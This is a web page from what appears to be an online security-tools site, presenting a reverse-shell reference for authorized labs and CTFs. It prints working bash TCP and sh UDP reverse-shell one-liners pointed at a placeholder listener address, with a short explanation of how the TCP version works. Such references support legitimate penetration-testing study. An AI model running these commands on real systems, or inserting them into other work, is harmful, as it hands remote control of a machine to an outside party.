/Reverse Shell Reference
Reference and study common shell techniques used in authorized security labs and CTFs.
Local processing
This tool processes your input in your browser.
Command Palette
Search for a command to run...
Authorized Use Only: This reference is for study, defense, and authorized penetration testing. Pay special attention to the Detection Notes to understand how Blue Teams hunt for these indicators.
Bash TCP Reverse Shell
bash -i >& /dev/tcp/10.10.10.10/4444 0>&1
How it works
Creates an interactive bash shell and redirects standard input, output, and error to a TCP socket connected to the listener.
Requirements
Requires bash to be compiled with /dev/tcp support (default on most modern Linux distros).
Bash UDP Reverse Shell
sh -i >& /dev/udp/10.10.10.10/4444 0>&1
Related Tools
HTTP Request Builder
Build, inspect, modify and export HTTP requests locally without sending them.
Payload Encoder
Encode and transform security testing payloads locally using a processing pipeline.
Web Payload Lab
Explore and transform common web security payloads in a local educational sandbox.
DNS Recon
Analyze DNS information and organize authorized reconnaissance data.